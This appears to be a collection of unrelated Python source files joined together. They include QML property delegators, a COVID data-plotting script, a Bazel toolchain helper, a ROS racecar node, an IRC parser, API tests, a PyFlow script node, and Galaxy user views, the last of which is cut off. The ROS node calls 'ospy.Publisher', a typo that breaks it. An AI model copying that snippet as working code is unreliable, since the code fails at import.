""" README: docs/everything-about-prop-delegators.zh.md """ # noinspection PyUnresolvedReferences,PyProtectedMember from typing import _UnionGenericAlias as RealUnionType from PySide6.QtQml import QQmlProperty from .typehint import * from ....qmlside import qmlside from ....qmlside.qmlside import convert_name_case from ....qmlside.qmlside import convert_primitive_type _REGISTERED_NAMES = ( 'qobj', 'name', 'prop', 'read', 'write', 'kiss', 'bind' ) class PrimitivePropDelegator: qobj: TQObject name: TPropName def __init__(self, qobj: TQObject, name: TPropName): self.qobj = qobj self.name = name def read(self): return self.qobj.property(convert_name_case(self.name)) def write(self, value): self.qobj.setProperty(convert_name_case(self.name), value) class PropDelegator: qobj: TQObject name: TPropName prop: TProperty def __init__(self, qobj: TQObject, name: TPropName): self.qobj = qobj self.name = name self.prop = QQmlProperty(qobj, convert_name_case(name)) def __getattr__(self, item): if item in _REGISTERED_NAMES or item.startswith('_'): return super().__getattribute__(item) else: return self.__get_subprop__(item) def __setattr__(self, key, value): """ Examples: xxx.name = 'xxx' xxx.width = 12 """ if key in _REGISTERED_NAMES or key.startswith('_'): super().__setattr__(key, value) else: self.__set_subprop__(key, value) def __get_subprop__(self, name: TPropName): raise NotImplementedError def __set_subprop__(self, name, value): raise NotImplementedError def read(self): return self.prop.read() def write(self, value): self.prop.write(value) def kiss(self, value): self.write(value) def bind(self, abstract_prop_expression: tuple[TQObject, str]): """ Documents: See `docs/black-magic-about-binding-mechanism.zh.md` Notes: Trying hard to complete dynamic binding feature. You cannot use this method for now. If you want to dynamically bind the others' properties, try the following instead: # WIP <item_A>.<prop>.bind(<item_B>.<prop>) # Workaround <item_B>.<prop_changed>.connect( lambda: <item_A>.<prop> = <item_B>.<prop> ) """ # last_frame = currentframe().f_back # event, participants = self._extract_frame_info(last_frame) raise NotImplemented # @staticmethod # def _extract_frame_info(frame): # """ # Learning: # source code of lk-logger # # TODO: much work (unittest & optimization) need to be done... # """ # filename = frame.f_code.co_filename # lineno = frame.f_lineno # file = open(filename, 'r', encoding='utf-8') # source_line = file.read().splitlines()[lineno - 1] # file.close() # # assert (m := re.match(r'^ +(?:\w+\.)+\.bind\(', source_line)), ''' # Your binding statement is too complex to analyse! # In current verison (v0.1.x) we can only parse format likes # `<some_qobj>.<property_name>.bind(<expression>)`. # Here's the position error happened FYI: # Filename: {} # Lineno: {} # Source Line: {} # '''.format(filename, lineno, source_line) # source_line_stem = source_line[m.span()[0]:] # # from lk_logger.scanner import get_all_blocks # from ...base_item import BaseItem # FIXME: not a good way # # segs = source_line_stem[1:].split(',') # segs[-1] = segs[-1].rstrip(', ') # event = '' # participants = [] # locals_ = frame.f_locals() # for match0 in get_all_blocks(source_line_stem): # event = match0.fulltext.strip() # break # for match in get_all_blocks(*segs, end_mark=','): # obj_name, prop_name, *_ = match.fulltext.split('.') # # e.g. 'btn.x' -> 'btn' # if obj_name in locals_: # obj = locals_[obj_name] # if isinstance(obj, BaseItem) and prop_name in obj.auth_props: # participants.append(QQmlProperty(obj.qobj, prop_name)) # # return event, participants class PropDelegatorA(PropDelegator): def __get_subprop__(self, name): # e.g. xxx.width.color -> error raise AttributeError( 'Illegal property: {}.{}!'.format(self.name, name), 'This property ({}) doesn\'t support accessing secondary property ' 'from it.'.format(self.name), 'Did you mean `PropDelegatorB` or `PropDelegatorC`?' ) def __set_subprop__(self, name, value): # e.g. xxx.width.color = '#FFFFFF' raise AttributeError( 'Illegal property: {}.{}!'.format(self.name, name), 'This property ({}) doesn\'t support setting a secondary property ' 'value to it.'.format(self.name), 'Did you mean `PropDelegatorB` or `PropDelegatorC`?' ) class PropDelegatorB(PropDelegator): def __get_subprop__(self, name) -> PropDelegatorA: # e.g. border.width -> PropDelegator(<border.width>) # ^^^^^ # name return PropDelegatorA(self.prop.read(), name) def __set_subprop__(self, name, value): # e.g. border.width = 12 # ^^^^^ ^^ # name value prop = self.__get_subprop__(name) if isinstance(value, PropDelegator): prop.write(value.read()) else: prop.write(getattr(value, 'qobj', value)) def read(self): return self class PropDelegatorC(PropDelegator): def __get_subprop__(self, name): # e.g. anchors.top -> QQmlSideProp(<anchors.top>) return QmlSideProp(self.qobj, f'{self.name}.{name}') def __set_subprop__(self, name, value: 'QmlSideProp'): # e.g. anchors.top = xxx.anchors.bottom self.__get_subprop__(name).write(value) # t = self.__get_subprop__(name) # s = value # qmlside.bind_prop(t.qobj, t.prop_name, s.qobj, s.prop_name) def read(self): return self def write(self, value: 'QmlSideProp'): # e.g. anchors.write(xxx.anchors.top) raise AttributeError('Property not writable: {}'.format(self.name)) class QmlSideProp: def __init__(self, qobj: TQObject, prop_name: str, **kwargs): self.qobj = qobj self.prop_name = prop_name for k, v in kwargs.items(): setattr(self, k, v) def read(self): return qmlside.eval_js('{{0}}.{}'.format( convert_name_case(self.prop_name) ), self.qobj) def write(self, value: 'QmlSideProp'): t_obj, t_prop_name = self.qobj, self.prop_name if isinstance(value, QmlSideProp): s_obj, s_prop_name = value.qobj, value.prop_name elif hasattr(value, 'qobj'): s_obj, s_prop_name = value.qobj, '' else: s_obj, s_prop_name = convert_primitive_type(value), '' if t_prop_name == 'anchors.center_in': s_prop_name = '' elif t_prop_name == 'anchors.fill': pass elif t_prop_name.startswith('anchors.'): s_prop_name = s_prop_name.removeprefix('anchors.') qmlside.bind_prop(t_obj, t_prop_name, s_obj, s_prop_name) def __add__(self, other): return self.read() + other def __radd__(self, other): return other + self.read() def adapt_delegator(qobj: TQObject, name: TPropName, constructor: TConstructor) -> TDelegator: if type(constructor) is RealUnionType: # e.g. Union[float, PropDelegatorA] delegator = constructor.__args__[-1] # -> PropDelegatorA # we had an agreement that always put `type:TDelegator` in the last # position of `TConstructor`. see reason at [TODO] and some # implementation code at `..authorized_props.ItemProps`. else: # noinspection PyTypeChecker if issubclass(constructor, PropDelegator): # e.g. constructor is PropDelegatorA delegator = constructor else: # e.g. constructor is float delegator = PrimitivePropDelegator return delegator(qobj, name)
python
import time,calendar,os,json,sys,datetime from requests import get from subprocess import Popen,PIPE from math import sqrt,log,exp from scipy.optimize import minimize import numpy as np np.set_printoptions(precision=3,linewidth=120) def datetoday(x): t=time.strptime(x+'UTC','%Y-%m-%d%Z') return calendar.timegm(t)//86400 def daytodate(r): t=time.gmtime(r*86400) return time.strftime('%Y-%m-%d',t) def get_data(req): url='https://api.coronavirus.data.gov.uk/v1/data?' response = get(url+req, timeout=10) if not response.ok: raise RuntimeError(f'Request failed: { response.text }') date=time.strftime('%Y-%m-%d',time.strptime(response.headers['Last-Modified'],'%a, %d %b %Y %H:%M:%S %Z'))# Not currently used data=response.json()['data'] # Convert from list form to dictionary keyed by age day=datetoday(data[0]['date']) n=1 while n<len(data) and datetoday(data[n]['date'])==day-n: n+=1# Find maximal contiguous date range data1=[] for i in range(n-1,-1,-1): d=data[i] e={'date':d['date']} for x in d: if x!='date': for y in d[x]: if 'value' in y: val=y['value'] else: val=y['deaths'] e[y['age']]=e.get(y['age'],0)+val data1.append(e) return data1 req='filters=areaType=nation;areaName=england&structure={"date":"date","blah":"newDeaths28DaysByDeathDateAgeDemographics"}'; mortdata=get_data(req) req='filters=areaType=nation;areaName=england&structure={"date":"date","blah":"cumAdmissionsByAge"}'; hospdata=get_data(req) req='filters=areaType=nation;areaName=england&structure={"date":"date","male":"maleCases"}'; malecases=get_data(req) req='filters=areaType=nation;areaName=england&structure={"date":"date","female":"femaleCases"}'; femalecases=get_data(req) casedata=[] for (m,f) in zip(malecases,femalecases): d={'date': m['date']} assert m['date']==f['date'] for s in [m,f]: for x in s: if x!='date': d[x]=d.get(x,0)+s[x] casedata.append(d) updatedate=casedata[-1]['date'] now=datetime.datetime.utcnow().strftime('%Y-%m-%d') # Save case data because we might want to artificially implement cases-by-publication-date-and-age. (newCasesByPublishDateAgeDemographics not working) fn=os.path.join('apidata',updatedate) if len(sys.argv)==1 and os.path.isfile(fn): sys.exit(1)# Exit signalling no update needs to be done os.makedirs('apidata', exist_ok=True) with open(fn,'w') as fp: json.dump(casedata,fp,indent=2) def getdiff(data): n=len(data) newdata=[] for i in range(1,n): l={'date':data[i]['date']} for age in data[i]: if age!='date': l[age]=data[i][age]-data[i-1].get(age,0) newdata.append(l) return newdata newhosp=getdiff(hospdata) newcases=getdiff(casedata) newmcases=getdiff(malecases) newfcases=getdiff(femalecases) newcases=newcases[:-1]# Last entry seems particularly unreliable, I think because it using specimen date and there are biases with recent entries newmcases=newmcases[:-1] newfcases=newfcases[:-1] # Convert (eg) string ages '15_19', '15_to_19', '60+' to (15,20), (15,20), (60,150) respectively def parseage(x): if x[-1]=='+': return (int(x[:-1]),150) x=x.replace('_to_','_')# cater for 65_to_69 and 65_69 formats aa=[int(y) for y in x.split("_")] return (aa[0],aa[1]+1) # Convert (eg) (15,20) to "15 - 19" def unparse(r): (a,b)=r if b==150: return "%d+"%a return "%d - %d"%(a,b) # Convert dictionary from using '15_19' (etc) format to (15,20) format # At the same time remove age brackets such as '60+' and '00_59' that strictly contain other age brackets, so avoiding overcounting # Return list of ages def convertages(dd): ages0=[(x,parseage(x)) for x in dd[-1] if x!='date'] ages1={} for (x,(a,b)) in ages0: for (y,(c,d)) in ages0: if c>=a and d<=b and (c>a or d<b): break else: ages1[x]=(a,b) ee=[] for d in dd: e={} e['date']=d['date'] for x in ages1: e[ages1[x]]=d.get(x,0) ee.append(e) ages2=sorted(ages1.values()) return (ee,ages2) #date=max(hosp[-1]['date'],cases[-1]['date']) #mindate=daytodate(datetoday(updatedate)-90) mindate='2020-12-30'#daytodate(datetoday(updatedate)-90) hosp,hospages=convertages(newhosp) cases,caseages=convertages(newcases) deaths,deathages=convertages(mortdata) fcases,_=convertages(newfcases) mcases,_=convertages(newmcases) # For fancysmooth - not currently used smoothness=1e6 def LL(rr,xx,lx): L=0 n=len(rr) er=np.exp(rr) for i in range(7): x=xx[i::7].sum() ew=x/(er[i::7].sum()) L+=x*log(ew) # xx.lx is only a constant, but subtracting makes LL more meaningful and keeps it in a better range of values L+=(xx*(rr-lx)).sum() dd=-rr[:-2]+2*rr[1:-1]-rr[2:] t=(dd*dd).sum() #s=(rr*rr).sum();L-=n*log(t/s) L-=smoothness/2*t # Seems that scaling down objective function to control precision works significantly better than reducing tolerance in SLSQP (option ftol) return -L/n/300 # Not currently used def fancysmooth1(data): deb=0 ages=[x for x in data[0].keys() if x!='date'] xx=np.array([sum(d[age] for age in ages) for d in data]) lx=np.log(xx) n=len(xx) # Convenient to optimise in the 'gauge' rr.sum()=0 because it doesn't involve xx (minimize can't handle auxiliary variables?) but transform to other gauge afterwards # (Actually, probably don't need this constraint) constr={'type':'eq', 'fun':lambda rr: rr.sum()} # bounds=[(-30,30) for d in range(n)] res=minimize(LL,np.zeros(n),args=(xx,lx),method="SLSQP",constraints=[constr],options={"maxiter":10000}) if not res.success: raise RuntimeError(res.message) if deb: print(res.nit,"iterations") rr=res.x if deb: print(LL(rr,xx,lx));print() # Regauge to put underlying Poisson parameter on the same footing as original data rr+=log(xx.sum()/np.exp(rr).sum()) er=np.exp(rr) if deb: ww=[log(xx[i::7].sum()/er[i::7].sum()) for i in range(7)] vv=[ww[d%7] for d in range(n)] ev=np.exp(vv) print((-np.exp(vv+rr).sum())) print((xx*(vv+rr-lx)).sum()) dd=-rr[:-2]+2*rr[1:-1]-rr[2:] t=(dd*dd).sum() s=(rr*rr).sum() print(-smoothness/2*t,n*log(t/s)) aa=[xx[i::7].sum()/len(xx[i::7]) for i in range(7)] bb=[aa[d%7] for d in range(n)] yy=xx/bb yy*=xx.sum()/yy.sum() with open('temp','w') as fp: for i in range(n): print("%12g %12g %12g %12g %12g"%(xx[i],er[i],ev[i],er[i]*ev[i],yy[i]),file=fp) return def simplesmooth1(data): n=len(data) ages=[x for x in data[0].keys() if x!='date'] xx=np.array([sum(d[age] for age in ages) for d in data]) ww=[xx[i::7].sum()/len(xx[i::7]) for i in range(7)] vv=np.array([ww[d%7] for d in range(n)]) vv*=(xx/vv).sum()/xx.sum() smoothed=[] for d in range(n): di={'date': data[d]['date']} for age in ages: di[age]=data[d][age]/vv[d] smoothed.append(di) return smoothed def simplesmooth2(data): ages=[x for x in data[0].keys() if x!='date'] n=len(data) smoothed=[] for i in range(n): d={'date': data[i]['date']} j0=max(i-3,0) j1=min(i+4,n) for age in ages: d[age]=sum(data[j][age] for j in range(j0,j1))/(j1-j0) smoothed.append(d) return smoothed def smooth(data): #return data #return simplesmooth1(data) #return simplesmooth2(data) return simplesmooth2(simplesmooth1(data)) hosp=smooth(hosp) cases=smooth(cases) deaths=smooth(deaths) mcases=smooth(mcases) fcases=smooth(fcases) def makegraph(title='A graph', data=[], mindate='0000-00-00', ylabel='', outfn='temp.png', extra=[]): po=Popen("gnuplot",shell=True,stdin=PIPE);p=po.stdin # Use this to cater for earlier versions of Python whose Popen()s don't have the 'encoding' keyword def write(*s): p.write((' '.join(map(str,s))+'\n').encode('utf-8')) write('set terminal pngcairo font "sans,13" size 1920,1280') write('set bmargin 5;set lmargin 15;set rmargin 15;set tmargin 5') write('set output "%s"'%outfn) write('set for [i=9:16] linetype i dashtype (20,7)') write('set key right') write('set title "%s"'%title) write('set ylabel "'+ylabel+'"') write('set xdata time') write('set format x "%Y-%m-%d"') write('set timefmt "%Y-%m-%d"') write('set tics scale 2,0.5') write('set xtics "2020-01-06", 604800')#%startdate)# Date labels on Mondays write('set xtics rotate by 45 right offset 0.5,0') write('set grid xtics ytics lc rgb "#dddddd" lt 1') write('set xtics nomirror') for x in extra: write(x) s='plot ' first=True for dat in data: if not first: s+=', ' first=False s+='"-" using 1:2 with lines '+dat.get('extra','')+' lw 3 title "%s"'%(dat['title']) write(s) for dat in data: for (date,val) in dat['values']: if date>=mindate: write(date,val) write("e") p.close();po.wait() print("Written graph to %s"%outfn) if 0: days=(range(330,340),[-1]) ll=[] for (ages,numthings,desc) in [(caseages,cases,"cases"), (deathages,deaths,"deaths")]: aa={} dd={} for end in [0,1]: for cut in [x[0] for x in ages]+[150]: dd[(end,cut)]=sum(numthings[day][age] for day in days[end] for age in ages if age[0]<cut)/len(days[end]) n=len(ages) for c0 in range(n-2): cut0=ages[c0][0] for c1 in range(c0+1,n-1): cut1=ages[c1][0] for c2 in range(c1,n): cut2=ages[c2][0] rr=[] for end in [0,1]: rr.append(dd[(end,cut1)]-dd[(end,cut0)]) rr.append(dd[(end,150)] -dd[(end,cut2)]) if min(rr)>=10: aa[cut0,cut1,cut2]=rr[1]/rr[0]/(rr[3]/rr[2]) ll.append(aa) l=[] for x in ll[0]: if x in ll[1]: l.append((sqrt(ll[0][x]*ll[1][x]),*x)) l.sort(reverse=True) for (r,cut0,cut1,cut2) in l: if cut2<=70: print("%2d %2d %2d %7.3f"%(cut0,cut1,cut2,r)) if r<0.9*l[0][0]: break title='Hospital admissions and confirmed cases/deaths ratios for Covid-19 in England, adjusted to be 1 on 1st January 2021\\nLast few values subject to change. Source: https://coronavirus.data.gov.uk/ at '+now data=[] for (desc, dat, ages, cutoff0, cutoff1, cutoff2) in [ ("Hospital admissions", hosp, hospages, 0, 18, 65), ("Confirmed cases", cases, caseages, 0, 50, 55), ("Deaths", deaths, deathages, 0, 50, 55)]: lowages=[age for age in ages if age[0]>=cutoff0 and age[1]<=cutoff1] highages=[age for age in ages if age[0]>=cutoff2] for d in dat: if d["date"]=="2021-01-01": break f=sum(d[a] for a in highages)/sum(d[a] for a in lowages) if desc=="Deaths": maxdate="2021-03-29" else: maxdate="9999-99-99" data.append({ 'title': desc+": %.2g * (aged %s) / (aged %s)"%(1/f,unparse((highages[0][0],highages[-1][1])),unparse((lowages[0][0],lowages[-1][1]))), 'values': [(d['date'],sum(d[a] for a in highages)/sum(d[a] for a in lowages)/f) for d in dat if d['date']>=mindate and d['date']<=maxdate] }) makegraph(title=title, data=data, mindate=mindate, ylabel='Adjusted Ratio', outfn='admissionandcaseageratios2.png') ################################# # Old graphs (14 Jan - 5 March) # ################################# title='Hospital admissions and confirmed cases/deaths ratios for Covid-19 in England. Last few values subject to change.\\nSource: https://coronavirus.data.gov.uk/ at '+now cutoff0=65;cutoff1=150;cutoff2=80 data=[] data.append({ 'title': 'Hospital admissions: (aged 85+) / (aged 18-64 or 85+)', 'values': [(d['date'],(d[(85,150)])/(d[(18,65)]+d[(85,150)])*100) for d in hosp if d['date']>=mindate] }) lowages=[age for age in caseages if age[0]>=cutoff0 and age[1]<=cutoff1] highages=[age for age in caseages if age[0]>=cutoff2] data.append({ 'title': 'Confirmed cases: (aged %s) / (aged %s)'%(unparse((cutoff2,150)),unparse((cutoff0,cutoff1))), 'values': [(d['date'],sum(d[a] for a in highages)/sum(d[a] for a in lowages)*100) for d in cases if d['date']>=mindate] }) lowages=[age for age in deathages if age[0]>=cutoff0 and age[1]<=cutoff1] highages=[age for age in deathages if age[0]>=cutoff2] data.append({ 'title': 'Deaths: (aged %s) / (aged %s) - 25%%'%(unparse((cutoff2,150)),unparse((cutoff0,cutoff1))), 'values': [(d['date'],sum(d[a] for a in highages)/sum(d[a] for a in lowages)*100-25) for d in deaths if d['date']>=mindate], #'extra': 'axis x1y2' }) makegraph(title=title, data=data, mindate=mindate, ylabel='Percentage', outfn='admissionandcaseageratios.png') ######################## data=[] lowages=[age for age in caseages if age[0]>=16 and age[1]<=65] data.append({ 'title': 'Confirmed cases: #(female aged 16-65) / #(male aged 16-65)', 'values': [(f['date'],sum(f[a] for a in lowages)/sum(m[a] for a in lowages)) for (f,m) in zip(fcases,mcases) if f['date']>=mindate] }) makegraph(title=title, data=data, mindate=mindate, ylabel='Ratio', outfn='femalemalecaseratio.png') ######################## data=[] for age in [(18,65), (65,85), (85,150)]: data.append({ 'title': unparse(age), 'values': [(d['date'],d[age]) for d in hosp] }) title='Hospital admissions for Covid-19 in England by age group. Last few values subject to change.\\nSource: https://coronavirus.data.gov.uk/ at '+now makegraph(title=title, data=data, mindate=mindate, ylabel='Number of age group admitted', outfn='hospitaladmissionsbyage-abs.png') ######################## # Todo when can be bothered: normalise this by number in each age group data=[] for ageband in range(0,90,10): if ageband<80: lim=ageband+10 else: lim=150 data.append({ 'title': unparse((ageband,lim)), 'values': [(d['date'],sum(d[age] for age in caseages if age[0]>=ageband and age[1]<=lim)) for d in cases] }) title='Confirmed cases per day for Covid-19 in England by age group. Last few values subject to change.\\nSource: https://coronavirus.data.gov.uk/ at '+now makegraph(title=title, data=data, mindate=mindate, ylabel='Number of cases per day', outfn='confirmedcasesbyage-abs.png')#, extra=['set logscale y']) if 0: # Looking at hospitalisations per case ave=14 delay=10 for t in range(-ave,-250,-ave): print(cases[t]['date']+":",end='') for age in hospages: print(" %s:"%str(age),end='') nh=nc=0 for i in range(ave): nh+=hosp[t+i][age] c=cases[t+i-delay] for a in c: if a=='date': continue if a[0]>=age[0] and a[1]<=age[1]: nc+=c[a] print("%5.1f"%(nh/nc*100),end='') print() print() for t in range(-ave,-250,-ave): nh=nc=0 for i in range(ave): nh+=sum(hosp[t+i][x] for x in hospages) nc+=sum(cases[t+i-delay][x] for x in caseages) print("%s: %5.1f"%(cases[t]['date'],nh/nc*100))
python
# # Copyright 2018 Asylo authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Provides a function to look up a toolchain installation path.""" def _fail_if_directory_does_not_exist(repository_ctx, path, what): result = repository_ctx.execute(["test", "-d", path]) if result.return_code == 0: return path fail("Install path to " + what + " does not exist: " + path) def _try_get_file_line1(repository_ctx, path): result = repository_ctx.execute(["cat", path]) if result.return_code == 0: # First line of output with no \n: return result.stdout.split("\n", 1)[0] return None def installation_path(repository_ctx, file, user_defined, default, what): """Looks up an installation location. Args: repository_ctx: A repository_rule context object. file: The file that should contain the installation location. user_defined: A path that user may provide to override lookup (may be None). default: When both |file| and |user_defined| are unavailable, fall back on this value (may be None). what: A string for the failure message to indicate which component could not retrieve its installation location. Returns: string: A path to a directory. """ result = "" if user_defined: result = user_defined if not result: result = _try_get_file_line1( repository_ctx, repository_ctx.os.environ["HOME"] + "/.asylo/" + file, ) if not result: result = _try_get_file_line1( repository_ctx, "/usr/local/share/asylo/" + file, ) if not result: result = default what = what + " [default]" test_result = repository_ctx.execute(["test", "-d", result]) if test_result.return_code != 0: result = "/opt/asylo/toolchains/sgx_x86_64" what = what + " [INTERNAL TRANSITION]" if not result: fail("Unknown install location for " + what) return _fail_if_directory_does_not_exist(repository_ctx, result, what)
python
""" Author : Varundev Suresh Babu Version: 0.1 """ import rospy from std_msgs.msg import Float64 steering_publisher = ospy.Publisher("/servo/position", Float64, queue_size = 10) throttle_publisher = rospy.Publisher("/motor/duty_cycle", Float64, queue_size = 10) def steering_callback(data): global steering steering.data = (data.data + 100.0)/200.0 def throttle_callback(data): global throttle throttle = data if __name__ == '__main__': global steering global throttle steering = Float64() throttle = Float64() rospy.init_node('basic_racecar_control_node') rospy.Subscriber("steering_control", Float64, steering_callback) rospy.Subscriber("throttle_control", Float64, throttle_callback) steering_publisher.publish(steering) throttle_publisher.publish(throttle) rospy.spin()
python
# -*- coding: utf-8 -*- # created by inhzus from .smms import ImageHost from .md_parser import parse_md
python
def rawify_url(url): if url.startswith("https://github.com"): urlparts = url.replace("https://github.com", "", 1).strip('/').split('/') + [None] * 5 ownername, reponame, _, refvalue, *filename_parts = urlparts filename = '/'.join([p for p in filename_parts if p is not None]) assert ownername is not None, "URL should include the name of the owner/organization." assert reponame is not None, "URL should include the name of the repository." if refvalue is None: refvalue = "main" if filename == '': filename = "CITATION.cff" return f"https://raw.githubusercontent.com/{ownername}/{reponame}/{refvalue}/{filename}" # return unrecognized URLs as-is return url
python
"""Raw message parser implementations.""" from twisted.words.protocols.irc import ctcpExtract, parsemsg, X_DELIM from . import Message from ..hostmask import Hostmask class RawMessageParser(object): """An implementation of the parsing rules for a specific version of the IRC protocol. In most cases, you should use the `~.Connection.parser` attribute of a `.Connection` to retrieve an instance of this class. """ def __init__(self): self.functions = {} def command(self, *commands): """A decorator that registers a function as a parameter parser for messages of the types given in *commands*.""" def decorator(function): for command in commands: self.functions[command] = function return function return decorator def parse(self, connection, outgoing, raw, **kwargs): """Parse a raw IRC message string and return a corresponding `.Message` object. Any keyword arguments override field values returned by the parser.""" try: prefix, command, params = parsemsg(raw) except IndexError: parsed_kwargs = {'action': 'unknown'} else: parsed_kwargs = {'actor': Hostmask.from_string(prefix)} if command in self.functions: try: parsed_kwargs['action'] = command.lower() parsed_kwargs.update( self.functions[command](command, params)) except IndexError: del parsed_kwargs['action'] if 'action' not in parsed_kwargs: parsed_kwargs['action'] = 'unknown' parsed_kwargs['subaction'] = command splits = 2 if raw.startswith(':') else 1 params = raw.split(None, splits) if len(params) > splits: parsed_kwargs['content'] = params[splits] else: parsed_kwargs['content'] = '' parsed_kwargs.update(kwargs) return Message(connection, outgoing, raw=raw, **parsed_kwargs) #: A parser for the standard IRC version 2 protocol. IRCV2_PARSER = RawMessageParser() @IRCV2_PARSER.command('QUIT', 'NICK') def parse_undirected_message(command, params): return {'content': params[0]} @IRCV2_PARSER.command('TOPIC') def parse_directed_message(command, params): return {'venue': params[0], 'content': params[1]} @IRCV2_PARSER.command('PRIVMSG', 'NOTICE') def parse_ctcpable_directed_message(command, params): kwargs = parse_directed_message(command, params) if params[1].startswith(X_DELIM): # CTCP extended message quoting is pathologically designed, but # nobody actually sends more than one at a time. Thankfully. tag, data = ctcpExtract(params[1])['extended'][0] kwargs['content'] = data if tag.lower() == 'action': kwargs['action'] = 'action' else: kwargs['action'] = ('ctcpquery' if command == 'PRIVMSG' else 'ctcpreply') kwargs['subaction'] = tag return kwargs @IRCV2_PARSER.command('JOIN') def parse_join(command, params): return {'venue': params[0]} @IRCV2_PARSER.command('PART', 'MODE') def parse_part_mode(command, params): return {'venue': params[0], 'content': ' '.join(params[1:])} @IRCV2_PARSER.command('KICK') def parse_kick(command, params): return {'venue': params[0], 'target': params[1], 'content': params[2]}
python
#-*- coding: utf-8 -*- from bgesdk.error import APIError import pytest import six def check_result(result): assert 'result' in result assert 'count' in result assert 'next_page' in result next_page = result['next_page'] assert isinstance(result['result'], list) assert isinstance(result['count'], int) assert isinstance(next_page, int) or next_page is None class TestTaxonAbundance: @pytest.mark.parametrize('taxon_ids', [None, 'tx1', 'tx2']) def test_result(self, api, logger, self_meta_biosample_id, taxon_ids): """正常返回的数据""" ret = api.get_taxon_abundance(self_meta_biosample_id) logger.debug(ret) check_result(ret) @pytest.mark.parametrize('taxon_ids', ['txdemo', 'tx', 'test']) def test_invalid_txid(self, api, logger, self_meta_biosample_id, taxon_ids): """格式错误的 taxon 编号""" ret = api.get_taxon_abundance(self_meta_biosample_id, taxon_ids) logger.debug(ret) check_result(ret) assert ret['count'] == 0 @pytest.mark.parametrize('taxon_ids', ['txid815']) def test_valid_txid(self, api, logger, self_meta_biosample_id, taxon_ids): """在平台类群丰度 taxon_id 集合内的编号""" ret = api.get_taxon_abundance(self_meta_biosample_id, taxon_ids) logger.debug(ret) check_result(ret) assert ret['count'] == 1 @pytest.mark.parametrize('taxon_ids', ['txid1323']) def test_outter_txid(self, api, logger, self_meta_biosample_id, taxon_ids): """不在平台类群丰度 taxon_id 集合内的编号""" ret = api.get_taxon_abundance(self_meta_biosample_id, taxon_ids) logger.debug(ret) check_result(ret) assert ret['count'] == 0 class TestFuncAbundance: @pytest.mark.parametrize('catalog', ['go', 'ko', 'eggnog', 'pfam', 'kegg-pwy', 'kegg-mdl', 'level4ec', 'metacyc-rxn', 'metacyc-pwy']) def test_result(self, api, logger, self_meta_biosample_id, catalog): """正常返回的数据""" try: ret = api.get_func_abundance(self_meta_biosample_id, catalog) except APIError as error: with pytest.raises(APIError) as e: raise error e.value.code == 41202 e.value.msg == u'BGE 私有接口错误: 样品数据未入仓' return logger.debug(ret) check_result(ret) class TestGeneAbundance: def check_result(self, result): assert 'result' in result assert 'count' in result assert 'next_page' in result next_page = result['next_page'] assert isinstance(result['result'], list) assert isinstance(result['count'], int) assert next_page is None or isinstance(next_page, six.text_type) @pytest.mark.parametrize('catalog, data_type', [ ('UniRef90_HUMAnN2_0.11', 'file')]) def test_result(self, api, logger, self_meta_biosample_id, catalog, data_type): """正常返回的数据""" ret = api.get_gene_abundance(self_meta_biosample_id, catalog, data_type) logger.debug(ret) self.check_result(ret) @pytest.mark.parametrize('catalog, data_type', [ ('UniRef90_HUMAnN2_0.11', 'list')]) def test_invalid_args(self, api, self_meta_biosample_id, catalog, data_type): """正常返回的数据""" with pytest.raises(APIError) as e: api.get_gene_abundance(self_meta_biosample_id, catalog, data_type) assert e.value.code == 41001 assert e.value.msg == u'参数错误'
python
# coding=utf-8 from .email import EmailFromTemplate def send_email(name, ctx_dict, send_to=None, subject=u'Subject', **kwargs): """ Shortcut function for EmailFromTemplate class @return: None """ eft = EmailFromTemplate(name=name) eft.subject = subject eft.context = ctx_dict eft.get_object() eft.render_message() eft.send_email(send_to=send_to, **kwargs)
python
import weakref import uuid from types import MethodType from collections import OrderedDict from Qt import QtGui from Qt.QtWidgets import QPushButton from Qt.QtWidgets import QGraphicsProxyWidget from Qt.QtWidgets import QMenu from PyFlow.Core.Common import * from PyFlow.UI.Utils.Settings import * from PyFlow.Core.NodeBase import NodeBase from PyFlow import getPinDefaultValueByType from PyFlow.Core.PyCodeCompiler import Py3FunctionCompiler class pythonNode(NodeBase): def __init__(self, name): super(pythonNode, self).__init__(name) self.currentComputeCode = '' @staticmethod def pinTypeHints(): return {'inputs': [], 'outputs': []} def serialize(self): default = super(pythonNode, self).serialize() default['computeCode'] = self.currentComputeCode return default def postCreate(self, jsonTemplate=None): super(pythonNode, self).postCreate(jsonTemplate) if jsonTemplate is None: return if 'computeCode' in jsonTemplate: self.currentComputeCode = jsonTemplate['computeCode'] compute = Py3FunctionCompiler( 'compute').compile(self.currentComputeCode) self.compute = MethodType(compute, self) # recreate pins for i in jsonTemplate['inputs']: inPin = self.createInputPin(i['name'], i['dataType'], getPinDefaultValueByType(i['dataType'])) inPin.setData(i['value']) inPin.dirty = i['bDirty'] for o in jsonTemplate['outputs']: compute = self.compute if o['dataType'] in ('AnyPin', 'ExecPin') else None outPin = self.createOutputPin(o['name'], o['dataType'], getPinDefaultValueByType(o['dataType']), compute) self.autoAffectPins() @staticmethod def category(): return 'Common' @staticmethod def keywords(): return ['Code', 'Expression', 'py'] @staticmethod def description(): return 'Python script node'
python
import logging from rest_framework import exceptions from django.core.exceptions import ObjectDoesNotExist from django.contrib.auth.models import AnonymousUser from django.contrib.auth import get_user_model from galaxy.api import serializers from galaxy.api.views import base_views from galaxy.main import models __all__ = [ 'UserList', 'UserDetail', 'ActiveUserView', 'UserNotificationSecretList', 'UserRepositoriesList', 'UserRolesList', 'UserStarredList', 'UserSubscriptionList', ] logger = logging.getLogger(__name__) User = get_user_model() class UserDetail(base_views.RetrieveUpdateAPIView): model = User serializer_class = serializers.UserSerializer def get_object(self, qs=None): obj = super(UserDetail, self).get_object() if not obj.is_active: raise exceptions.PermissionDenied() return obj class UserList(base_views.ListAPIView): model = User serializer_class = serializers.UserSerializer def get_queryset(self): qs = super(UserList, self).get_queryset() return qs.filter(is_active=True) class ActiveUserView(base_views.RetrieveAPIView): model = User serializer_class = serializers.ActiveUserSerializer view_name = 'Me' def get_object(self): try: obj = self.model.objects.get(pk=self.request.user.pk) except ObjectDoesNotExist: obj = AnonymousUser() return obj class UserRepositoriesList(base_views.SubListAPIView): model = models.Repository serializer_class = serializers.RepositorySerializer parent_model = User relationship = 